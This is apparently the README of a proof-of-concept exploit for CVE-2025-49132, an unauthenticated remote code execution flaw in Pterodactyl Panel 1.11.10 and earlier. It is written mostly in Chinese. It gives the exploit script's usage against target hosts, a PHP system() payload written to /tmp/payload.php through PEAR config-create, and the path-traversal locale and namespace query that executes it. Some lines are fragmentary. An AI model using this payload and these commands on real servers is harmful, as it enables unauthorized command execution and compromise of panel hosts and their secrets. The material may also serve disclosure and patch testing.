
PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel - 未认证远程代码执行 (RCE)
CVE‑2025‑49132 是一个影响 Pterodactyl Panel <= 1.11.10 的严重远程代码执行漏洞。
未认证的攻击者可以利用 /locales/locale.json 端点的输入验证不当来执行任意系统命令。
已在版本 1.11.11 中修复
成功利用可导致:
.env)严重等级:严重
该漏洞源于以下参数的验证不当:
locale 参数namespace 参数攻击者可以:
../../../../../)config-create/tmp弱点分类:CWE-94 — 代码生成控制不当
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
默认路径:
/usr/share/php/PEAR
从 /phpinfo.php 页面获取正确路径

攻击者使用以下命令将恶意 PHP 载荷注入 /tmp/payload.php:
/<?=system('id')?>+/tmp/payload.php
通过调用:
?locale=../../../../../tmp&namespace=payload
服务器执行注入的 PHP。

locale 和 namespace 输入进行清理